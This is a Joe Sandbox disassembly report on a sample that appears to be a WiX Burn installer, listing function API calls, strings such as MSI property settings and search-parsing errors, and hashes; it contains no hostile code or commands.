API String ID: 71445658-955085611
Opcode ID: 7813b9c26be582fdd6e930af7c56664e1e45693fefeb4898b2a14e840e09a068
Instruction ID: 64c8d356ddf4b7c496b2139f7fd88f3230cda60804b1195a402102f91a3a97a2
Opcode Fuzzy Hash: 7813b9c26be582fdd6e930af7c56664e1e45693fefeb4898b2a14e840e09a068
Instruction Fuzzy Hash: 39F0F633A81236669B304B5F8C05B7FAE49EBC47B0F35C527BD46AA350E6258C0096F0

Function 009D35C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009D35F8

Part of subcall function 009D304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,009D3609,00000000,?,00000000), ref: 009D3069
Part of subcall function 009D304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,009BC025,?,00995405,?,00000000,?), ref: 009D3075

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: fa9ff2c4f23ae84e7dd95f39377a927020bdba5c443f96e865c73843c2b0e079
Instruction ID: 688ac4f69357435c9f630f589a5c5218cd6bd9178071bb85d3c0e51e783845c1
Opcode Fuzzy Hash: fa9ff2c4f23ae84e7dd95f39377a927020bdba5c443f96e865c73843c2b0e079
Instruction Fuzzy Hash: DE315076D01229AFCB11DFA8C885ADEF7F8EF08711F01856AED05BB311D6319D008BA5

Function 009D5870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,009FAAA0,00000000,80070490,?,?,009A8B19,WiX\Burn,PackageCache,00000000,009FAAA0,00000000,00000000,80070490), ref: 009D58CA

Part of subcall function 009D10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009D112B
Part of subcall function 009D10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 009D1163

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: 5a1ca967803bafba0e9ea61e39783eab3a7cc70088d05998ebb2fdae353b4fb3
Instruction ID: b0b80b42fea6a84ccd097abb345d4f20db94cc86f1aaa1e9b0da6d9fdc999420
Opcode Fuzzy Hash: 5a1ca967803bafba0e9ea61e39783eab3a7cc70088d05998ebb2fdae353b4fb3
Instruction Fuzzy Hash: 54118636881629EFCB216E94D9415AEB76CEF44360B16C17BED4167311C7314E50F7D1

Function 009934B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,009A8BD3,0000001C,80070490,00000000,00000000,80070490), ref: 009934D5

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 7422ab2690bb6d1198063f7dc6e5116a95110d7b37e415ab307ea321ec396915
Instruction ID: 6422f0eb346a1e00df0409e2308c25edce3a58174b0e95d4703f10daa863a50c
Opcode Fuzzy Hash: 7422ab2690bb6d1198063f7dc6e5116a95110d7b37e415ab307ea321ec396915
Instruction Fuzzy Hash: 34E05B723411287BEF122FA99C05DEB7B9CEF55354701C055FE44D6010D772D55097B0

Function 009D2EFE Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,00000000,0099556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D2F0B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 65821fdbf235e55e66be006e540b72115f95c318082724b1431ccd9f48e95071
Instruction ID: 2bc618c88ad37a4a9bfa63bb9c4a5119b2810e3af5b5cfc17c56ae59b7c1fd11
Opcode Fuzzy Hash: 65821fdbf235e55e66be006e540b72115f95c318082724b1431ccd9f48e95071
Instruction Fuzzy Hash: 5EE0F6B193E625DE8B008F69FD546627BBCB719B70315820BB804C2220CBB04441EFA0

Function 009CF49A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009CF491

Part of subcall function 009D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009D9A09
Part of subcall function 009D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009D9A1A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bda590f9c7bfaa60c775746254143ca256c25df3ab02874b238ee3bc1570b187
Instruction ID: 90b015faa1b6aeda3cca5201dff0fba2532d152a7ac78b01f25b64b250b87fb6
Opcode Fuzzy Hash: bda590f9c7bfaa60c775746254143ca256c25df3ab02874b238ee3bc1570b187
Instruction Fuzzy Hash: FCB012E12A95056E328871141D27E37014CC2C5FB1330C57FB504C1160E8841C420233

Function 009CF4AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009CF491

Part of subcall function 009D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009D9A09
Part of subcall function 009D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009D9A1A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7b04f5cd3c61b115d7b0e62aea74fd273975640d931fd77d337737e25b43af7a
Instruction ID: 6f44c9da07028faefe50587e91ec1cec5063ef5c644a8f1eee5a3de0f35511b6
Opcode Fuzzy Hash: 7b04f5cd3c61b115d7b0e62aea74fd273975640d931fd77d337737e25b43af7a
Instruction Fuzzy Hash: 25B012E12A96056D328871141C26E37014CC2C5FB1330C67FF504C1160E8802C810233

Function 009CF479 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009CF491

Part of subcall function 009D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009D9A09
Part of subcall function 009D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009D9A1A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3f2f48661f4f456c3ab81c4461cce357f324cbd5677492e3978be2ce3ea69869
Instruction ID: da783a11c442c95a37837955b449e03bb29d1d73db4f88893e12956a9ad3eb8d
Opcode Fuzzy Hash: 3f2f48661f4f456c3ab81c4461cce357f324cbd5677492e3978be2ce3ea69869
Instruction Fuzzy Hash: 79B012E52A95057D324831101C26D37010CC2C1FB1330C67FB900C0060A8801C410133

Function 009D9684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009D966B

Part of subcall function 009D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009D9A09
Part of subcall function 009D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009D9A1A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0ada4c22d7816ed0d56b6f1e6cde597bfef787d950b5f984a9abd2d22a9c761a
Instruction ID: 0aac81858b9581af0aec5cb7af433a5e429044832d769be40a5502904d6a50c7
Opcode Fuzzy Hash: 0ada4c22d7816ed0d56b6f1e6cde597bfef787d950b5f984a9abd2d22a9c761a
Instruction Fuzzy Hash: 38B012D22E83056C3A8471442E43D37014CC7C0F95370C52FB104D1340E8845C420332

Function 009D9653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009D966B

Part of subcall function 009D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009D9A09
Part of subcall function 009D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009D9A1A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fa0c65b6497fde0a35ab732b6a00fabcf8100365c0922c9fe077067eeec9210
Instruction ID: 4eec6516f4a82960ab4604d27d4ee62b688ef46d03dd073a1a6750ed9fe65253
Opcode Fuzzy Hash: 0fa0c65b6497fde0a35ab732b6a00fabcf8100365c0922c9fe077067eeec9210
Instruction Fuzzy Hash: 5AB012D22E82097C3A4431006C82C37010CC7C0F95370C52FB100E0240E8805C410333

Function 009D9674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009D966B

Part of subcall function 009D998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009D9A09
Part of subcall function 009D998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009D9A1A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b25126e4c8bb6312bed42b9dd1a736be16d46a3c3a007cd493678492baf588b7
Instruction ID: 23e7ebbd8a7bfbfbdfc0649649142bd1651ddb763c393ab23f09b8911ae12419
Opcode Fuzzy Hash: b25126e4c8bb6312bed42b9dd1a736be16d46a3c3a007cd493678492baf588b7
Instruction Fuzzy Hash: 8CB012D32E81066C368471041C03D37018CC3C0F51370C52FB504C1240E8805C450332

Function 009914B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,009921A8,?,00000000,?,00000000,?,0099390C,00000000,?,00000104), ref: 009914E8

Part of subcall function 00993BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009921CC,000001C7,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993BDB
Part of subcall function 00993BD3: HeapSize.KERNEL32(00000000,?,009921CC,000001C7,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993BE2

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 2c78518400ef5a52dcf73e273f717973170ac1b2feb4c701cd5a1cbd5e37df47
Instruction ID: 6e9cf361b5b60e688d07f00acad93ea8a6837a0939921c52267a864dcb71a0c8
Opcode Fuzzy Hash: 2c78518400ef5a52dcf73e273f717973170ac1b2feb4c701cd5a1cbd5e37df47
Instruction Fuzzy Hash: E801F93724022BABCF115E5CDC80F9A7769BF88750F124215FA165B261D631AC408AA1

Non-executed Functions

Function 0099A8F1 Relevance: 172.2, APIs: 29, Strings: 69, Instructions: 688COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0099B11C

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

CompareStringW.KERNEL32(0000007F,00000000,009DCA9C,000000FF,DirectorySearch,000000FF,009DCA9C,Condition,feclient.dll,009DCA9C,Variable,?,009DCA9C,009DCA9C,?,?), ref: 0099AA29
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0099AA7E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0099AA9A
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0099AABE
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0099AB11
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0099AB2B
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0099AB53
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0099AB91
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0099ABB0
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0099ABCF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0099AC8D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0099ACA7

Part of subcall function 009D32F3: VariantInit.OLEAUT32(?), ref: 009D3309
Part of subcall function 009D32F3: SysAllocString.OLEAUT32(?), ref: 009D3325
Part of subcall function 009D32F3: VariantClear.OLEAUT32(?), ref: 009D33AC
Part of subcall function 009D32F3: SysFreeString.OLEAUT32(00000000), ref: 009D33B7

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0099AD06
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0099AD28
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0099AD48
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0099AE20
SysFreeString.OLEAUT32(?), ref: 0099AFFE

Strings

MsiFeatureSearch, xrefs: 0099AF53
Type, xrefs: 0099AA56, 0099AAE9, 0099AC42, 0099ADC2, 0099AEC2, 0099AFAC
Invalid value for @Root: %ls, xrefs: 0099B078
ExpandEnvironment, xrefs: 0099ACBB
Failed to get Value attribute., xrefs: 0099B03C
Failed to get @ComponentId., xrefs: 0099B086
Failed to get Key attribute., xrefs: 0099B06E
feclient.dll, xrefs: 0099A9F8
search.cpp, xrefs: 0099A973
msi.dll, xrefs: 0099AC5C
Failed to get @VariableType., xrefs: 0099B064
Failed to get @ProductCode or @UpgradeCode., xrefs: 0099B094
Invalid value for @VariableType: %ls, xrefs: 0099B05D
Value, xrefs: 0099AC1F
MsiComponentSearch, xrefs: 0099AD61
HKU, xrefs: 0099ABE1
string, xrefs: 0099AD1B
Failed to get search node count., xrefs: 0099A945
cabinet.dll, xrefs: 0099ACBA
Failed to get @Id., xrefs: 0099B0E4
numeric, xrefs: 0099ACF7
Path, xrefs: 0099AA3B, 0099AACE
Root, xrefs: 0099AB69
Failed to get @ExpandEnvironment., xrefs: 0099B050
path, xrefs: 0099AA8D, 0099AB3A
VariableType, xrefs: 0099ACDE
ProductCode, xrefs: 0099AD84, 0099AE5C, 0099AF76
MsiProductSearch, xrefs: 0099AE39
Condition, xrefs: 0099A9F9
clbcatq.dll, xrefs: 0099AA3A, 0099AACD, 0099AD83, 0099AF75
Key, xrefs: 0099AC04
DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch, xrefs: 0099A90D
RegistrySearch, xrefs: 0099AB46
Failed to get @Type., xrefs: 0099B0B0
wininet.dll, xrefs: 0099AC03
Failed to allocate memory for search structs., xrefs: 0099A97D
exists, xrefs: 0099AA6F, 0099AB02, 0099AC7E
HKCU, xrefs: 0099ABA3
state, xrefs: 0099ADF7, 0099AF13, 0099AFC5
assignment, xrefs: 0099AF2D
FileSearch, xrefs: 0099AAB1
HKCR, xrefs: 0099AB82
Failed to select search nodes., xrefs: 0099A920
Win64, xrefs: 0099AC5D
value, xrefs: 0099AC9A
Failed to get next node., xrefs: 0099B0EB
keyPath, xrefs: 0099ADDB
directory, xrefs: 0099AE13
HKLM, xrefs: 0099ABC2
comres.dll, xrefs: 0099ADA6, 0099AE5B, 0099AE8B, 0099AF90
Failed to get @Variable., xrefs: 0099B0DD
Failed to get @Condition., xrefs: 0099B028
UpgradeCode, xrefs: 0099AE8C
ComponentId, xrefs: 0099ADA7
version, xrefs: 0099AB1E, 0099AD3B, 0099AEDB
Failed to get @FeatureId., xrefs: 0099B0B7
DirectorySearch, xrefs: 0099AA1A
Failed to get @Path., xrefs: 0099B032
version.dll, xrefs: 0099AC1E
FeatureId, xrefs: 0099AF91
Failed to get @Root., xrefs: 0099B07F
language, xrefs: 0099AEF7
Failed to get @ProductCode., xrefs: 0099B0BE
Invalid value for @Type: %ls, xrefs: 0099B0A1
Unexpected element name: %ls, xrefs: 0099B0CD
Failed to get @UpgradeCode., xrefs: 0099B08D
`5w, xrefs: 0099AFFE, 0099B11C
Failed to get Win64 attribute., xrefs: 0099B046
Variable, xrefs: 0099A9DE

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$`5w$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
API String ID: 2748437055-2030278073
Opcode ID: bac511bdfc93be677db0cba12de6c1de3c9ee9b268a06b6a7831a5d63f6f4959
Instruction ID: 82e2df2602d29c203edf49015e761e620c4ad5002a0c9b1d4025fa3ae1b576ab
Opcode Fuzzy Hash: bac511bdfc93be677db0cba12de6c1de3c9ee9b268a06b6a7831a5d63f6f4959
Instruction Fuzzy Hash: 4322C831DC8226BADF219A988D42F6E7A64EF41B74F208352F630BA3D4D7749E40D6D1

Function 009B41EA Relevance: 43.0, Strings: 34, Instructions: 498COMMON

Download Yara Rule

Strings

Failed to add the list of dependencies to ignore to the properties., xrefs: 009B46CA
REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 009B45F5
WixBundleExecutePackageCacheFolder, xrefs: 009B436A, 009B48A4
Failed to add feature action properties to obfuscated argument string., xrefs: 009B44DB
Failed to run maintanance mode for MSI package., xrefs: 009B46F6
ACTION=ADMIN, xrefs: 009B4709
Failed to install MSI package., xrefs: 009B4746
Failed to build MSI path., xrefs: 009B439D
feclient.dll, xrefs: 009B42C5, 009B434D, 009B441D, 009B454B, 009B47D8
Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 009B460C
crypt32.dll, xrefs: 009B440A
Failed to add reboot suppression property on install., xrefs: 009B45BB
%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 009B4687
Failed to add obfuscated properties to argument string., xrefs: 009B4497
Failed to get cached path for package: %ls, xrefs: 009B434F
Failed to add reinstall all property on minor upgrade., xrefs: 009B45EA
Failed to add patch properties to obfuscated argument string., xrefs: 009B451F
Failed to add feature action properties to argument string., xrefs: 009B44B9
Failed to add reboot suppression property on uninstall., xrefs: 009B477D
Failed to add ADMIN property on admin install., xrefs: 009B471E
Failed to initialize external UI handler., xrefs: 009B43F4
Failed to add properties to argument string., xrefs: 009B4463
REINSTALL=ALL, xrefs: 009B45D3, 009B464D
WixBundleExecutePackageAction, xrefs: 009B43B7, 009B48B4
%ls %ls=ALL, xrefs: 009B46B6, 009B4795
Failed to add patch properties to argument string., xrefs: 009B44FD
msasn1.dll, xrefs: 009B440B
REBOOT=ReallySuppress, xrefs: 009B45A0, 009B476C
Failed to perform minor upgrade of MSI package., xrefs: 009B4638
VersionString, xrefs: 009B428E, 009B42EF
Failed to uninstall MSI package., xrefs: 009B47EF
IGNOREDEPENDENCIES, xrefs: 009B46A5, 009B4784
Failed to enable logging for package: %ls to: %ls, xrefs: 009B441F
Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 009B469B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI 